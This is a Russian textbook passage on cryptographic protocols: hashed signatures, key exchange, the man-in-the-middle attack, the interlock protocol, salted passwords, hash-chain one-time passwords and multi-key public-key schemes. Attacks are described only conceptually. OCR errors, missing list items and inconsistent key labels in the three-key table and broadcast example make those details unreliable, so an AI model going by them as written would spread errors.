К сожалению, при некоторых обстоятельствах Борис может обмануть Антона, если воспроизведет точную копию документа вместе с подписью, поставленной под ним Антоном. Еще одна копия документа, который представляет собой обычный деловой договор между двумя сторонами, по; оды не сделает. Однако если у Бориса в руках окажется точная копия чека на кругленькую сумму, выписанного Антоном, последний может понести значительный материальный ущерб.
Поэтому, как и в обыденной жизни, на все документы обычно ставятся дата и время их подписания, которые, в свою очередь, также снабжаются цифровой подписью наравне с самим документом. В результате банк сможет разоблачить попытку дважды обналичить один и тот же чек, а у смошенничавшего Бориса в тюрьме будет много свободного времени, которое он сможем посвятить более тщательному изучению криптографических протоколов.
Использование однонаправленных хэш-функций для подписания документов
На практике криптосистемы с открытым ключом не всегда эффективны при подписании документов значительного объема. В целях экономии времени можно подписывать не сам документ, а хэш-значение, вычисленное для этого документа при помощи однонаправленной хэш-функции. Участники протокола должны только заранее условиться о том, какой алгоритм шифрования с открытым ключом и какую однонаправленную хэш-функцию они будут использовать для подписания документов:
1. Антон подвергает документ хэшированию при помощи однонаправленной хэш-функции.
2. Антон шифрует вычисленное хэш-значение с использованием собственного тайного ключа, тем самым ставя под документом свою подпись, и отправляет это хэш-значение Борису в зашифрованном виде вместе с документом.
3. Борис вычисляет хэш-значение документа, расшифровывает хэш-значение, присланное ему Антоном, с использованием открытого ключа Антона. Если два полученных хэш-значения совпадают, то подпись Антона под документом верна.
Для подписания документа непременно должна быть использована однонаправленная хэш-функция, поскольку в противном случае злоумышленник Зиновий окажется в состоянии сгенерировать множество документов, хэш-значения которых совпадут. А тогда подписание Антоном одного конкретного документа станет равносильно подписанию им всех документов, имеющих такие же хэш-значения.
Кроме того, при использовании однонаправленных хэш-функций для подписания документов подпись можно хранить отдельно. А следовательно в архиве, в котором данный протокол применяется для проверки подлинности подписи, достаточно хранить только зашифрованные хэш-значения файлов. При возникновении разногласий относительно авторства документа достаточно найти в архиве соответствующее шифрованное хэш-значение, расшифровать его и проверить, совпадает ли оно с хэш-значением, вычисленным для спорного документа.
Дополнительная терминология
Криптографы придумали множество алгоритмов цифровой подписи. Все они основаны на криптосистемах с открытым ключом. При этом секретная информация используется для того, чтобы поставить подпись под документом, а общедоступная — чтобы проверить подлинность этой подписи. Поэтому часто процесс подписания документа называют шифрованием на тайном ключе, а процесс проверки подлинности подписи — расшифрованием на открытом ключе. Однако это справедливо только для одного алгоритма шифрования с открытым ключом — RSA, а подавляющее большинство остальных алгоритмов цифровой подписи совершенно непригодны для шифрования сообщений.
По этой причине в ходе дальнейшего изложения о процессах подписания документа и проверки подлинности подписи будет говориться без упоминания конкретных алгоритмов, которые используются для этих целей. Подписание документа Р при помощи тайного ключа К будет обозначаться S К (P), а проверка подлинности подписи с использованием соответствующего открытого ключа — V К (P).
Битовая строка, которая присоединяется к документу при его подписании (например, хэш-значение файла, зашифрованное на тайном ключе) будет именоваться цифровой подписью. И наконец, протокол, при помощи которого получатель сообщения убеждается в подлинности и целостности этого сообщения, будет называться аутентифнкационным протоколом.
Несколько подписей под одним документом
Каким образом Антон и Борис могут поставить свои цифровые подписи под одним и тем же документом? Если не задействовать однонаправленные хэш-функции, существуют 2 способа сделать это.
Если использовать однонаправленную хэш-функцию, от перечисленных недостатков можно легко избавиться:
1. Антон подписывает хэш-значение документа.
2. Борис подписывает хэш-значение того же самого документа.
3. Борис отсылает свою подпись Антону.
4. Антон шлет документ вместе со своей подписью и подписью Бориса Владимиру.
5. Владимир проверяет подлинность подписей Антона и Бориса.
Неоспоримость
Вполне возможна ситуация, при которой Антон, подписав некоторый документ, впоследствии попытается ее оспорить — заявит о том, что подпись под документом поставил не он. Причиной может послужить, например. потеря Антоном своего тайного ключа в людном месте или намеренная его публикация Антоном в разделе частных объявлений популярной газеты. Эта ситуация называется отказ от обязательств.
Уменьшить ущерб отказа от обязательств помогает введение в подпись даты и времени, когда она была поставлена под документом. Конечно, ничего нельзя поделать в случае, если Антон заранее предпринял определенные действия для создания условий, при которых его подпись под документом должна быть признана недействительной. Но можно, по крайней мере, сделать так, чтобы эти действия не позволили Антону объявить поддельными все остальные его подписи, которые он ранее поставил под другими документами:
1. Антон подписывает документ.
2. Антон генерирует заголовок, в который помещает свои личные данные. присоединяет этот заголовок к подписанному им документу, еще раз подписывает итоговый документ и посылает его Дмитрию.
3. Дмитрий проверяет вторую подпись Антона, добавляет к его сообщению отметку о дате и времени получения этого сообщения, подписывает его. а затем отправляет Антону и Борису.
4. Борис проверяет подпись Дмитрия, персональные данные Антона и его подпись.
5. Антон знакомится с содержанием сообщения, присланного Дмитрием Если Антон обнаруживает в этом сообщении что-то подозрительное, он должен немедленно заявить об этом во всеуслышание.
Цифровая подпись и шифрование
Аналогии из повседневной жизни помогают лучше понять, как должны быть устроены криптографические протоколы, чтобы обеспечивать максимальную защиту от мошенников и злоумышленников. Возьмем, к примеру. обыкновенное письмо, приготовленное Антоном для отправки Борис) по почте. Антон всегда подписывает свои письма Борису, прежде чем вкладывает их в конверты. А почему бы Антону не подписывать сами конверты? Да потому, что получив конверт с подписью Антона и обнаружив в нем неподписанное письмо, Борис не сможет убедиться в том, что подлинное письмо Антона не было подменено на пути следования от отправителя к адресату.
Аналогичная ситуация сложилась и в криптографии: если Антон хочет послать шифрованное сообщение, завизированное своей подписью, то ему лучше сначала подписать открытый текст этого сообщения и только затем зашифровать его вместе с поставленной пол ним подписью.
1. Антон подписывает сообщение Р при помощи своего тайного ключа К А:
S K A (P)
2. Антон шифрует подписанное сообщение, используя открытый ключ Бориса К Б , и посылает его Борису
Е K Б ( S K A (P) )
3. Борис расшифровывает сообщение Антона с помощью своего тайного ключа К Б :
D K Б ( Е K Б ( S K A (P) ) ) = S K A (P)
4. С помощью открытого ключа Антона К А, Борис проверяет подпись Антона и получает открытый текст его сообщения:
V K A (S K A (P) ) = Р
В результате подпись становится неотъемлемой частью сообщения (злоумышленник не может вместо шифрованного сообщения подставить свое собственное, сохранив под ним подлинную подпись отправителя). Кроме того, отправитель видит открытый текст сообщения, когда ставит под ним свою подпись.
Антон может использовать разные ключи для зашифрования документа и для того, чтобы поставить под ним подпись. Это позволит ему при необходимости передать ключ шифрования правоохранительным органам, не компрометируя собственную подпись, а также по своему выбору отдать один из двух ключей на хранение доверенным третьим лицам, сохранив второй и тайне от посторонних.
Однако совместное использование шифрования и цифровой подписи таит в себе особую опасность, если для зашифрования и генерации цифровой подписи используется один и тот же криптографический алгоритм. Рассмотрим для примера протокол, согласно которому после приема сообщения Борис немедленно должен послать отправителю этого сообщения подтверждение о его получении.
1. Антон подписывает сообщение при помощи своего тайного ключа, шифрует это сообщение, используя открытый ключ Бориса, и посылает его Борису:
Е K Б ( S K A (P) )
2. Борис расшифровывает сообщение Антона на своем тайном ключе, удостоверяется в подлинности подписи Антона с помощью его открытого ключа и восстанавливает открытый текст сообщения:
S K A (D K Б (Е K Б ( S K A (P) ) ) ) = P
3. Борис подписывает сообщение Антона с использованием своего тайного ключа, шифрует это сообщение вместе со своей подписью на открытом ключе Антона и отсылает обратно:
Е K A ( S K Б (P) )
4. Антон расшифровывает сообщение Бориса при помощи своего тайного ключа и проверяет подлинность подписи Бориса, используя его открытый ключ. Если в результате он получит сообщение, идентичное тому, которое он ранее отправил Борису, значит, сеанс связи прошел корректно.
К сожалению, если для шифрования и проверки цифровой подписи применяется одинаковый криптографический алгоритм (т. е., V K = E К и S К = D К ), Зиновий, являясь законным пользователем сети связи, при определенных условиях сможет читать шифрованную переписку Антона. Для этого, перехватив сообщение Антона Е K Б ( S K A (P) ) , Зиновий шлет его от своего имени Борису. Борис после расшифрования и проверки цифровой подписи Зиновия получит:
E K З (D K Б (Е K Б ( D K A (P) ) ) ) = E K З (D K А (P) )
В соответствии с протоколом Борис должен отправить Зиновию подтверждение правильности приема пришедшего ему сообщения:
В результате Зиновию останется только преобразовать сообщение, присланное ему Борисом, при помощи своего тайного ключа и известных открытых ключей Антона и Бориса — и вот он, заветный открытый текст Р сообщения, отправленного Антоном!
Конечно, все это стало возможным не только потому, что для шифрования и проверки цифровой подписи использовался один и тот же криптографический алгоритм. Борису следовало бы быть более внимательным и не отсылать подтверждение правильности приема сообщения, присланного Зиновием. Попытка расшифровать это сообщение привела к тому, что Борис получил открытый текст, не имеющий никакого смысла.
Отсюда вывод. Ни в коем случае не пытайтесь подписывать или шифровать произвольные сообщения, а затем делиться полученными результатами с другими людьми. Это для вас может плохо кончиться.
Основные криптографические протоколы
Обмен ключами
Распространенным приемом в криптографии является шифрование каждого передаваемого сообщения с помощью отдельного ключа. Такой ключ называется сеансовым, поскольку используется только на протяжении одного сеанса связи. Каким образом сеансовый ключ попадает в распоряжение отправителя и получателя шифрованного сообщения?
Обмен ключами для симметричных криптосистем
Предположим, что Антон и Борис, являющиеся пользователями компьютерной сети, получили секретные ключи от Дмитрия (доверенного липа, наделенного правами арбитра). Секретные ключи попали к Антону и Борису еще до начала сеанса связи, а злоумышленник Зиновий ровным счетом ничего не знает о том, какие это ключи. Тогда для обмена шифрованными сообщениями по компьютерной сети Антон и Борис могут воспользоваться следующим криптографическим протоколом:
1. Антон связывается с Дмитрием и запрашивает у него сеансовый ключ для связи с Борисом.
2. Дмитрий генерирует случайный сеансовый ключ и создает две шифрованных копии этого ключа — один раз Дмитрий шифрует сеансовый ключ с помощью секретного ключа Антона, второй — с помощью секретного ключа Бориса. Затем Дмитрий отсылает обе копии Антону.
3. Антон расшифровывает свою копию сеансового ключа.
4. Антон отправляет Борису его копию сеансового ключа.
5. Борис расшифровывает свою копию сеансового ключа.
6. Антон отправляет Борису сообщение, зашифрованное с использованием сеансового ключа, копия которого имеется у них обоих.
И Антон, и Борис полностью полагаются на честность Дмитрия. Если Зиновию удастся его подкупить или обмануть, ни о какой секретности обмена сообщениями между Антоном и Борисом не может быть и речи. В этом ел у чае Зиновий получит доступ ко всем ключам, используемым абонентами компьютерной сети, и сможет прочесть шифрованные сообщения, которыми они обмениваются по сети. Для этого Зиновию достаточно аккуратно копировать всю передаваемую через нее информацию.
Другой существенный недостаток этого протокола состоит в том, что арбитр является потенциальным узким местом в обмене сообщениями между Антоном и Борисом. Если Дмитрий по какой-либо причине не сможет вовремя снабдить их ключами, шифрованная связь между ними будет прервана.
Обмен ключами для криптосистем с открытым ключом
Обычно Антон и Борис используют криптографический алгоритм с открытым ключом, чтобы договориться о сеансовом ключе, при помощи которого они будут шифровать свои данные. В этом случае протокол обмена сеансовыми ключами значительно упрощается, и Антон может послать шифрованное сообщение Борису, даже если Борис и не слышал о существовании Антона:
1. Антон находит открытый ключ Бориса в справочнике, в базе данных или получает его от Дмитрия.
2. Антон генерирует случайный сеансовый ключ, шифрует его при помощи открытого ключа Бориса и отправляет ему в зашифрованном виде.
3. Борис расшифровывает сообщение Антона с использованием своего тайного ключа.
4. Антон и Борис обмениваются сообщениями, зашифрованными на одном и том же сеансовом ключе.
Атака методом сведения к середине
Петр, возможности которого ограничены лишь перехватом передаваемых сообщений, может попытаться вскрыть применяемый криптографический алгоритм с открытым ключом или организовать атаку со знанием только шифртекста. По сравнению с Петром у Зиновия выбор гораздо богаче: он ' может не только "подслушивать" за Антоном и Борисом, но также видоизменять и даже уничтожать сообщения, которыми они обмениваются между собой. Более того, Зиновий может перевоплотиться в Антона, когда общается с Борисом. Он также может попытаться выдать себя за Бориса, вступая в контакт с Антоном. При этом Зиновий может действовать, например, следующим образом:
1. Антон посылает Борису свой открытый ключ. Зиновий перехватывает этот ключ, а вместо него отсылает Борису свой собственный открытый ключ.
2. Борис посылает Антону свой открытый ключ. Зиновий перехватывает лог ключ, а вместо него отсылает Антону свой собственный открытый ключ.
3. Антон шлет Борису сообщение, зашифрованное с помощью открытого ключа, который Антон ошибочно считает принадлежащим Борису. Зиновий перехватывает это сообщение, расшифровывает его при помощи своего тайного ключа, произвольным образом изменяет его, снова зашифровывает на открытом ключе Бориса и затем отсылает адресату.
4. Борис шлет Антону сообщение, зашифрованное с помощью открытого ключа, который Борис ошибочно считает принадлежащим Антону. Зиновий перехватывает это сообщение, расшифровывает его при помощи своего тайного ключа, произвольным образом изменяет его, снопа зашифровывает на открытом ключе Антона и затем отсылает адресат.
Даже если в процессе обмена сообщениями Антон и Борис не передают свои открытые ключи по каналам связи, а просто извлекают их из базы данных, Зиновий может оказаться в состоянии перехватывать запросы в эту базу данных и подменять открытые ключи Антона и Бориса своими собственными. А еще Зиновий может проникнуть в базу данных, где хранятся открытые ключи Антона и Бориса, заменить их на свои собственные, а затем преспокойно дожидаться, пока Антон и Борис не захотят обменяться сообщениями.
Такая атака методом сведения к середине стала возможна потому, что Антон и Борис не в состоянии достоверно убедиться в том, что общаются друг с другом напрямую. И если, модифицируя сообщения Антона и Бориса. Зиновий научится делать это с такой быстротой, что задержка в передаче сообщений будет незаметной, ни Антон, ни Борис так никогда и не догадаются, что кто-то вклинился между ними и читает всю их якобы секретную переписку.
Блокировочный протокол
Блокировочный протокол, изобретенный американскими криптологами Р. Райвестом и А. Шамиром, позволяет существенно осложнить жизнь Зиновию и ему подобным личностям:
1. Антон посылает Борису свой открытый ключ.
2. Борис посылает Антону свой открытый ключ.
3. Антон зашифровывает свое сообщение и отсылает половину этого сообщения Борису.
4. Борис зашифровывает свое сообщение и отсылает половину этого сообщения Антону.
5. Антон отсылает вторую половину своего сообщения Борису.
6. Борис расшифровывает сообщение Антона с помощью своего тайного ключа. Борис отсылает вторую половину своего сообщения Антону.
7. Антон расшифровывает сообщение Бориса с помощью своего тайного ключа.
Необходимо, чтобы одну часть сообщения, посланного Антоном или Борисом, нельзя было прочитать, не имея на руках другой его части. Тогда Борис не сможет прочитать сообщение Антона до тех пор, пока не дойдет до шага 6 блокировочного протокола, а Борис не сможет ознакомиться с сообщением Антона до шага 7. Существует несколько способов добиться этого:
На шаге 1 блокировочного протокола Зиновий по-прежнему может подставить свой собственный открытый ключ вместо открытого ключа Антона. Однако теперь на шаге 3 Зиновий будет не в состоянии дешифровать перехваченное сообщение Антона и зашифровать его заново при помощи открытого ключа Бориса. Зиновию непременно придется придумать свое собственное сообщение (случайный битовый вектор или хэш-значение) и послан, его половину Борису. То же самое касается и сообщения Бориса Антону. которое Зиновий перехватит на шаге 4 блокировочного протокола. А после того как Зиновий получит в свое распоряжение вторые половины подлинных сообщений Антона и Бориса, будет уже слишком поздно изменить придуманные им ранее фальшивые сообщения, которые он уже отослал от их имени. Следовательно, Зиновию придется дать волю своей фантазии и продолжить вести всю переписку от имени Антона и Бориса.
Конечно, может случиться так, что, у Зиновия очень живое воображение и что, он весьма близко знаком с Антоном и Борисом. В результате они никогда не заподозрят, что на самом деле общаются не друг с другом, а с Зиновием. Однако в любом случае Зиновию будет значительно труднее, чем тогда, когда Антон и Борис используют обычный, а не блокировочный протокол.
Протокол обмена ключами с цифровой подписью
При обмене сеансовыми ключами атаку методом сведения к середине можно попытаться отразить также с помощью цифровой подписи. В этом случае Антон и Борис получают сеансовые ключи, подписанные Дмитрием, который является доверенным лицом, наделенным правами арбитра. Каждый сеансовый ключ снабжается свидетельством о его принадлежности определенному лицу. Получая от Дмитрия ключ, Антон и Борис могут проверить его подпись и убедиться, что этот ключ принадлежит именно тому человеку, которому они собираются послать сообщение.
В результате Зиновию придется весьма несладко. Он не сможет выдать себя за Антона или Бориса, поскольку не знает их тайных ключей. Зиновий будет лишен возможности подменить открытые ключи Антона и Бориса на свои собственные, поскольку в его распоряжении есть только сеансовые ключи с подписью Дмитрия, удостоверяющей их принадлежность Зиновию.
Зиновию остается только перехватывать шифрованные сообщения, которыми обмениваются Антон и Борис, и пытаться их читать с помощью криптоаналитических методов.
Однако следует отметить, что в протоколе обмена сеансовыми ключами с цифровой подписью появился новый участник — Дмитрий. Если Зиновий сумеет перевоплотиться в Дмитрия, он сможет подписывать и навязывать участникам протокола известные ему фальшивые сеансовые ключи. Таким образом, несмотря ни на что, у Зиновия все же остается возможность атаковать этот протокол, воспользовавшись методом сведения к середине.
Одновременная передача ключа и сообщения
Антон и Борис совершенно необязательно передают друг другу сеансовые ключи перед тем, как приступить к обмену сообщениями. Вместо этого они могут воспользоваться следующим протоколом:
1. Антон генерирует случайный сеансовый ключ Кис помощью него зашифровывает сообщение М, получая в результате Е К (М).
2. Антон извлекает открытый ключ Бориса В из базы данных.
3. Антон шифрует сеансовый ключ К при помощи В, получая в результате Е В (К) .
4. Антон посылает Борису Е к (М) и Е в (К).
5. Борис расшифровывает сеансовый ключ К с помощью своего тайного ключа.
6. Борис расшифровывает сообщение Антона на сеансовом ключе К.
Данный протокол наглядно демонстрирует использование современных гибридных криптосистем на практике. Для достижения большей стойкости в него может быть добавлена цифровая подпись, а также применены другие приемы, которые помогут сделать его более стойким против различных атак.
Множественная рассылка ключей и сообщений
Почему бы Антону не послать шифрованное сообщение сразу нескольким адресатам? Он может сделать это, например так:
1. Антон генерирует случайный сеансовый ключ Кис его помощью зашифровывает сообщение М, получая в результате Е К (М).
2. Антон извлекает открытые ключи Бориса, Владимира и Георгия из базы данных.
3. Антон шифрует К при помощи открытых ключей Бориса, Владимира и Георгия, получая в результате Е Б (К), Е в (К)и Е г (К).
4. Антон, посылает шифрованное сообщение Е к (М), а также многократно зашифрованный сеансовый ключ (E Б (K), Е в (К)и Е Г (К)) всем, кто пожелает их получить.
5. Только Борис, Владимир и Георгий смогут расшифровать сеансовый ключ К при помощи своих тайных ключей.
6. Только Борис, Владимир и Георгий смогут прочесть шифрованное сообщение Антона с помощью сеансового ключа К.
Когда Антон проходит процедуру регистрации для получения доступа к глобальной компьютерной сети Internet, каким образом информационно-коммерческая служба, услугами которой он пользуется, узнает, что это именно Антон, а не Зиновий, пытающийся бесплатно (за счет Антона) попутешествовать по Всемирной паутине? Чаще всего эта проблема решается при помощи пароля: Антон должен ввести некую секретную информацию. известную только ему и его поставщику услуг Internet. Причем вводить эту информацию надо каждый раз при прохождении процедуры регистрации.
Аутентификация при помощи однонаправленных функций
На сервере, который проверяет правильность введенного Антоном пароля. совершенно не обязательно хранить пароли пользователей. Достаточно научить сервер отличать правильные пароли от неправильных. Это легко сделать При помощи однонаправленных функций. Тогда на сервере будут присутствовать не сами пароли, а их хэш-значения:
1. Антон посылает на сервер свой пароль.
2. С помощью однонаправленной функции сервер вычисляет хэш-значение для присланного Антоном пароля.
3. Сервер сравнивает вычисленное хэш-значение с эталоном, который хранится в его памяти, и делает вывод о правильности пароля Антона.
Поскольку при такой схеме аутентификации пользователей уже не требуется держать пароли на сервере, то опасаться, что кто-либо взломает защиту сервера и украдет файл с паролями, нет никаких причин. Список хэш-значений, соответствующих паролям зарегистрированных пользователей. совершенно бесполезен для Зиновия, т. к. найти пароль по его yjiii-значению путем обращения однонаправленной функции ему не удастся.
Отражение словарной атаки при помощи "изюминок"
Файл с хэш-значениями, полученными из паролей, может подвергнуться словарной атаке. Составив словарь примерно из 1 млн самых распространенных паролей, Зиновий применит к ним хэш-функцию. В результате он получит файл объемом до 10 Мбайт, который уместится на нескольких дне кетах. Далее Зиновий украдет с сервера файл с паролями, зашифрованными с помощью хэш-функции, и сравнит его со своим файлом, содержащим хэш-значения для самых часто используемых паролей. Совпадающие хэш-значения позволят Зиновию определить некоторые из паролей.
Отразить словарную атаку помогает введение в схему аутентификации зарегистрированных пользователей так называемых изюминок. "Изюминка представляет собой случайную битовую строку, которая присоединяется к паролю прежде, чем к нему будет применена хэш-функция. Затем на сервере запоминается как вычисленное хэш-значение, так и соответствующая ему "изюминка".
Если количество возможных "изюминок" достаточно велико, от словарной атаки мало толку. Зиновий должен будет вычислять хэш-значение не только для каждого пароля, но и для каждой "изюминки". Смысл введения "изюминок" в схему аутентификации пользователей состоит в том. чтобы заставить злоумышленника совершать пробное шифрование всех паролей. входящих в составленный им словарь, каждый раз, когда он пытается вскрыть какой-либо отдельный пароль, вместо того чтобы заранее вычислить хэш-значения этих паролей, а затем просто сравнивать полученные значения с эталонными, украденными с сервера.
"Изюма" понадобится много. Во многих версиях операционной системы UNIX используются "изюминки" длиной 12 бит. Этого явно недостаточно: существуют программы, которые при помогли словарной атаки позволяют за неделю вскрыть от 30 до 40% всех паролей, применяемых пользователями UNIX.
Таким образом, схема аутентификации с "изюминками" не может служить панацеей. Она обеспечивает защиту только от словарной атаки всего файла с паролями, зашифрованными с помощью однонаправленной функции. Однако эта схема бессильна, когда мощной и слаженной атаке подвергается отдельный пароль конкретного пользователя.
Схема аутентификации с "изюминками" эффективна и тогда, когда при регистрации на разных серверах используется один и тот же пароль. Но если пароль плохой, лучше он все равно не станет, каким бы количеством "изюма" для его защиты вы ни запаслись.
Периодическая сменяемость паролей
Даже при наличии "изюминок" схема аутентификации пользователей путем проверки их паролей имеет один очень серьезный недостаток. Ведь не исключено, что линия связи, соединяющая персональный компьютер Антона с сервером информационно-коммерческой службы, проходит по территориям 33-х стран, законодательство которых по-разному трактует права своих и иностранных граждан на сохранение в тайне их личной переписки. И поэтому узнать пароль Антона, в принципе, может любой, кто сумеет подключиться к этой линии связи или обратиться в память сервера и узнать пароль. прежде чем для него будет вычислено соответствующее хэш-значение. Чтобы уменьшить ущерб от компрометации пароля, его следует периодически менять. Делается это следующим образом.
Антон генерирует случайное число R и пересылает его серверу, который вычисляет, исходя из этого числа и однонаправленной функции f значения x 1 = f (R), x 2 =f (f (R)), x 3 = f (f (f(R))) и т.д. 101 раз. Первые 100 вычисленных значений x 1 , х 2 , . . , x 100 передаются Антону в качестве списка паролей, который он должен хранить в тайне. A x 101 запоминается на сервере.
Теперь, когда Антон захочет зарегистрироваться для работы на сервере, ему достаточно ввести свое имя и число х 100 . Сервер вычислит f(x 100 ) и сравнит его с х 101 . В случае совпадения Антону будет разрешен доступ к серверу, который затем заменит х 101 на х 100 . А Антон вычеркнет х 101 из своего списка паролей.
В следующий раз, когда Антон снова захочет получить доступ к серверу, он найдет в списке паролей следующее по порядку не зачеркнутое значение х j . Сервер вычислит f(x j ) и сравнит с запомненным X j+ 1 .
Злоумышленник Зиновий, взломавший сервер, все равно не сможет узнать очередной пароль Антона x j по хранимому на сервере значению x j+l, поскольку функция f является однонаправленной. По той же самой причине. даже если Зиновий перехватит x j , это позволит ему зарегистрироваться под именем Антона всего лишь один раз. А значения x 1 , x 2 , ... , х j -1 так и останутся для Зиновия тайной за семью печатями при условии, что Антон достаточно ответственно относится к хранению списка паролей, полученного им с сервера.
Аутентификация при помощи криптосистем с открытым ключом
Ни "изюминки", ни периодически сменяемый пароль не гарантируют защиту от злонамеренных действий Петра, перехватывающего все сообщения Антона, которые тот пересылает по линии связи, соединяющей его с сервером. Решить эту проблему помогает применение криптографии с открытым ключом.
Предполагается, что на сервере имеется файл, в котором хранятся открытые ключи всех пользователей. В первом приближении криптографический протокол, который позволяет производить аутентификацию пользователей выглядит так:
1. Сервер генерирует случайную битовую строку и посылает ее Антону.
2. Антон шифрует эту строку при помощи своего тайного ключа и отсылает обратно на сервер.
3. На сервере производится расшифрование сообщения, пришедшего от Антона, с помощью его открытого ключа.
4. Если полученный в результате открытый текст идентичен случайной битовой строке, ранее посланной Антону, последний получает доступ к серверу.
Поскольку только Антон знает свой тайный ключ, никто не сможет выдать себя за Антона. Этот тайный ключ, скорее всего, представляет собой длинную битовую строку, которую очень трудно воспроизводить по памяти, и поэтому в распоряжении Антона должен быть интеллектуальный терминал. надежно защищенный от взлома и способный автоматически осуществлять набор требуемого тайного ключа при шифровании сообщений. Однако несмотря на это дополнительное условие, важнее всего то, что тайный ключ Антона не требуется передавать на сервер ни под каким видом. Следовательно, для надежной аутентификации пользователей совсем не обязательно наглухо защищать от подслушивания канал связи, соединяющий терминал Антона с сервером. Да и информация о пользователях, хранимая на сервере, может быть безо всякой опаски сделана доступной для всех, кто пожелает с ней ознакомиться.
Конечно, со стороны Антона глупо шифровать на своем тайном ключе произвольную битовую последовательность, причем вне зависимости от ее происхождения. Поэтому на практике для аутентификации пользователей обычно используется более сложный криптографический протокол:
1. Антон производит некоторые специальные вычисления на основе предварительно сгенерированной им случайной битовой последовательности и своего тайного ключа. Затем он отсылает вычисленные им значения на сервер.
2. Сервер посылает Антону случайную битовую последовательность, отличную от той, которая была задействована Антоном на шаге 1.
3. Антон производит некоторые специальные вычисления на основе обеих случайных битовых последовательностей (сгенерированной им самим, а также полученной с сервера) и своего тайного ключа. Затем он отсылает вычисленные значения на сервер.
4. На сервере производятся некоторые специальные вычисления на основе присланных Антоном значений и его открытого ключа, чтобы убедиться в том, что именно он является обладателем соответствующего тайного ключа.
5. Если проверка дает положительный результат, Антону разрешается доступ к серверу.
Если Антон, в свою очередь, не доверяет серверу в такой же степени, в какой сервер не доверяет ему, то он может потребовать, чтобы сервер аналогичным образом "удостоверил свою личность", воспользовавшись тем же самым протоколом.
Криптографические протоколы, предназначенные для аутентификации и обмена ключами, играют очень важную роль в обеспечении надежного функционирования современных компьютерных систем. Усилиями криптологов было создано много таких протоколов, однако по прошествии времени выяснилось, что не все из них позволяют должным образом защитить компьютерную систему от несанкционированного доступа и предотвратить компрометацию ключей. Причем для некоторых протоколов этот временной промежуток оказался довольно значительным и растянулся на несколько лет. Как следствие, возникла настоятельная потребность в разработке формальных методов, которые позволили бы находить изъяны в криптографических протоколах в более короткие сроки. И хотя большинство из этих методов являются универсальными и могут быть использованы для анализа произвольных криптографических протоколов, особое внимание изначально стало уделяться именно протоколам, позволяющим производить аутентификацию пользователей и обмен ключами.
К настоящему времени имеется 4 основных подхода к анализу криптографических протоколов. Первый из них применяет верификационные методы, которые не были специально разработаны для анализа криптографических протоколов. Некоторые из этих методов представляют протоколы в виде конечных автоматов, другие распространяют на них теорию исчисления предикатов первого порядка.
Второй подход заключается в использовании экспертных систем, позволяющих определить, возникают ли в ходе выполнения шагов протокола такие нежелательные события, как компрометация ключа или разглашение пароля. Этот подход дает возможность эффективнее находить в криптографических протоколах конкретные изъяны, однако никоим образом не гарантирует полного отсутствия таковых.
Авторами третьего подхода являются американские криптологи М. Бэрроуз. М. Абади, Р. Нидхэм (М. Burrows, M. Abadi, R. Needham). Они разработали формальную логическую модель, названную по первым буквам их фамилий БАН-логикой (BAN-logic). Составить с ее помощью общее представление о надежности криптографического протокола нельзя. Однако основное преимущество БАН-логики перед другими подходами заключается в том, что она состоит из набора простых логических правил, которые легко применяются на практике и весьма полезны при обнаружении отдельных изъянов в анализируемых протоколах.
При четвертом подходе выполнение шагов протокола моделируется с помощью алгебраической системы, которая строится исходя из знаний, имеющихся у участников протокола относительно этого протокола. Затем построенная алгебраическая модель подвергается формальному анализу на предмет достижимости некоторых из ее состояний.
В целом формальный анализ криптографических протоколов пока является довольно новой и до конца не сформировавшейся областью криптологии, и поэтому делать далеко идущие выводы о превосходстве какого-то одного из перечисленных четырех подходов еще рановато. Поживем — увидим.
Многоключевая криптография с открытым ключом
В криптографии с открытым ключом используются 2 ключа, один из которых применяется для зашифрования сообщений, а другой — для расшифрования. Вместо этого можно задействовать любое количество ключей. Рассмотрим для примера трехключевую криптосистему с открытым ключом.
Имеется три ключа К А , К Б и К С , которые распределены между участниками процесса обмена сообщениями следующим образом:
Антон К А
Борис К Б
Владимир К В
Георгий К А и К Б
Денис К Б и К В
Евгений К В и К А
Если Антон зашифрует свое сообщение с помощью ключа К А, расшифровать его смогут либо Денис, либо Борис совместно с Владимиром, которые имеют в своем распоряжении К Б и К В . Сообщение, зашифрованное Борисом, сможет прочесть Евгений. Владимир может зашифровать сообщение, которое в состоянии прочесть Георгий. Сообщение, зашифрованное Георгием при помощи ключа К А , смогут прочесть Денис. Если Георгий воспользуется ключом кб, то его сообщение прочитает Евгений, а если применит кб и кб, то с этим сообщением сможет ознакомиться Владимир. Аналогичным образом может .зашифровать свое сообщение Денис, и тогда его прочтут либо Антон, либо Георгий, либо Евгений. Всевозможные сочетания ключей шифрования и расшифрования перечислены в табл. 7.2.
Таблица 7.2. Сочетания ключей шифрования и расшифрования в трехключевой криптосистеме с открытым ключом
Зашифровано с помощью ключей:
Расшифровывается с помощью ключей:
К А
К Б и К В
К Б
К А и К В
К С
К А и К Б
К А и К Б
К В
К А и К В
К Б
К Б и К В
К А
Множественная рассылка шифрованных сообщений
Допустим, что требуется рассылать групповые шифрованные сообщения 100 различным абонентам компьютерной сети связи, причем заранее неизвестно какие конкретно сообщения надо будет послать отдельным группам этих абонентов. В такой ситуации можно выдать каждому абоненту свой ключ и шифровать все сообщения отдельно. В результате придется зашифровать и послан, слишком много сообщений. Можно снабдить каждого абонента ключами. число которых равняется количеству различных групп, составленных из 100 абонентов. Но тогда потребуется слишком много ключей (порядка 2 100 ) .
Выход из положения позволяет найти многоключевая криптография с открытым ключом. Предположим, что в компьютерной сети связи имеются всего 3 абонента — Антон, Борис и Владимир. Каждый из них получит по 2 ключа: Антон — К А и К Б , Борис — К Б и К В , Владимир — К А и К В . Тогда если потребуется послать сообщение для Антона, его надо зашифровать с помощью К С . Сообщение, предназначенное Борису, следует зашифровать при помощи К А . А если сообщение должен прочесть только Владимир, необходимо использовать К Б . Сообщение для Антона и Бориса шифруется на ключах К А и К В , для Антона и Владимира — на К Б и К В , для Бориса и Владимира — на К А и К Б .
В случае трех абонентов эта схема множественной рассылки сообщений группам абонентов выглядит не слишком впечатляюще, но при 100 абонентах ее преимущества становятся очевидны. Вместо порядка 2 100 ключей абонентам сети надо раздать всего 100 ключей, и посылать требуется всего одно шифрованное сообщение, а не n , где n — количество абонентов в группе ( n >1).
Недостаток рассмотренной схемы — необходимо точно указывать имена абонентов, которым предназначено рассылаемое сообщение, чтобы не заставлять всех остальных абонентов сети связи лихорадочно перебирать имеющиеся у них ключи в поисках того, который позволит им правильно прочесть принятое шифрованное сообщение. Не нужно доказывать, что при определенных условиях раскрытие этих имен перед злоумышленниками может быть весьма нежелательным.
Распределение ответственности
